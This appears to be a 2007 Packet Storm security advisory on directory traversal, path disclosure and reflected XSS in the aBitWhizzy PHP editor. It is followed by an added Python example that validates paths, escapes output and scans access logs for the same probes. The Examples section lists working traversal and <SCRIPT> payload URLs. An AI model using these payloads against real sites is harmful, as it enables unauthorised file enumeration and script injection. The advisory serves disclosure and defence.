abitwhizzy-traverse.txt

πŸ—“οΈΒ 29 Mar 2007Β 00:00:00Reported byΒ LostmonTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 27Β Views

aBitWhizzy folder traversal and XSS vulnerability

Code

```text
################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisory: http://lostmon.blogspot.com/2007/03/abitwhizzy-traversal-folder-enumeration.html
vendor notify: YES    exploit include: YES
################################################

aBitWhizzy is a PHP script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows remote enumeration of
arbitrary folders by directory traversal. The flaw exists because the
application does not validate the 'd' variable upon submission
to the 'whizzylink.php', 'whizzypic.php', 'whizzery/whizzypic.php' and
'whizzery/whizzylink.php' scripts. This could allow a remote user
to create a specially crafted URL containing '../' directory
traversal sequences to view the folder structure on the target
system with the privileges of the target web service.

This input validation error also permits cross-site scripting
style attacks and full path disclosure.

###################
VERSIONS
###################

Unknown version of aBitWhizzy

##################
SOLUTION
##################

No solution was available at this time !!

######################
TIMELINE
######################

discovered:         25-03-2007
vendor notify:      25-03-2007
vendor response:    ---------
Private Disclosure: 25-03-2007
public disclosure:  27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings

Cross Site Scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

########################### €nd ###################################

Thanks to estrella, I love you a lot ;P
Thanks to all of Lostmon's Group Team

--
sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what keeps the mind moving....
```
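The root cause in the advisory is a folder name taken straight from the 'd' query parameter and used both for a filesystem listing and, on error, in the page body. The Python below is an added example and is not part of Lostmon's advisory or of aBitWhizzy itself; it shows the two checks a defender wants for exactly that pattern. `resolve_browse_dir()` whitelists the characters of 'd', joins it onto an assumed web root (`BASE_DIR` is a placeholder, POSIX paths assumed) and refuses anything that normalises outside that root, which covers the `../` and `/../` forms in the Examples section; `reflect_safely()` HTML-escapes the value before it is echoed in an error page, which neutralises the `"><SCRIPT>` vector; and `scan_access_log()` applies the same traversal and markup tests to constructed Apache-style log lines that mirror the advisory's probe URLs, so the same probes can be found after the fact. All function names, the log lines and the web root are mine, not the project's.

```python
import html
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed web root of a hypothetical aBitWhizzy install; not taken from the advisory.
BASE_DIR = "/var/www/abitwhizzy"

# Conservative whitelist for a relative sub-folder name: letters, digits, space, _ - . /
SAFE_DIR_RE = re.compile(r"[A-Za-z0-9_\-./ ]*")


def resolve_browse_dir(d, base_dir=BASE_DIR):
    """Return the absolute folder the user may list, or None if 'd' must be refused.

    This is the check the advisory says is missing: the raw 'd' value was joined
    onto a directory path.  Here the value is whitelisted, joined, lexically
    normalised and then required to stay inside base_dir.  A real deployment
    would additionally call os.path.realpath() so symlinks cannot escape the root.
    """
    if SAFE_DIR_RE.fullmatch(d) is None:   # rejects quotes, <, >, NUL and similar
        return None
    if os.path.isabs(d):                   # the "/../../.." form from the advisory
        return None
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, d))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None                        # climbed out of the root via ../ segments
    return candidate


def reflect_safely(d):
    """HTML-escape 'd' before echoing it in an error page, so markup in it stays text."""
    return html.escape(d, quote=True)


# Detection side: patterns matching the advisory's example URLs, applied to the
# percent-decoded 'd' value of requests to the two affected scripts.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MARKUP_RE = re.compile(r"[<>\"']")
TARGET_SCRIPTS = ("whizzylink.php", "whizzypic.php")

# Apache combined log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(request_target):
    """Return the reasons a request target resembles the advisory's probes ([] if clean)."""
    parts = urlsplit(request_target)
    if os.path.basename(parts.path) not in TARGET_SCRIPTS:
        return []
    reasons = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("d", []):
        value = unquote(value)             # second pass catches double-encoded %252e%252e
        if TRAVERSAL_RE.search(value):
            reasons.append("directory traversal in d")
        if MARKUP_RE.search(value):
            reasons.append("markup or quote in d (XSS / path disclosure probe)")
    return reasons


def scan_access_log(lines):
    """Return (client_ip, request_target, reasons) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if m is None:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


# Constructed log lines (RFC 5737 documentation addresses) modelled on the advisory's examples.
SAMPLE_LOG = [
    '203.0.113.9 - - [27/Mar/2007:10:01:02 +0000] "GET /abitwhizzy/whizzylink.php?d=images HTTP/1.1" 200 512',
    '203.0.113.9 - - [27/Mar/2007:10:01:05 +0000] "GET /abitwhizzy/whizzylink.php?d=%27 HTTP/1.1" 200 731',
    '203.0.113.9 - - [27/Mar/2007:10:01:09 +0000] "GET /abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings HTTP/1.1" 200 2048',
    '203.0.113.9 - - [27/Mar/2007:10:01:12 +0000] "GET /abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings%22%3E%3CSCRIPT%3Ealert(%27XSS%27)%3C/SCRIPT%3E HTTP/1.1" 200 2101',
    '198.51.100.4 - - [27/Mar/2007:10:02:00 +0000] "GET /index.php?d=../../etc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for d in ("images", "../../../../../../../Documents and Settings", "'"):
        print(repr(d), "->", resolve_browse_dir(d))
    for ip, target, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, target, reasons)
```

The containment test is deliberately lexical so it runs offline; on a live system `os.path.realpath()` on the candidate (and a second containment check on its result) closes the symlink case. The log scanner only looks at the two script names the advisory lists, so the unrelated `index.php` probe in the sample is ignored by design; widening `TARGET_SCRIPTS` is the one-line change for other applications with the same pattern.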

Vulners AI Score: 7.4 (High risk)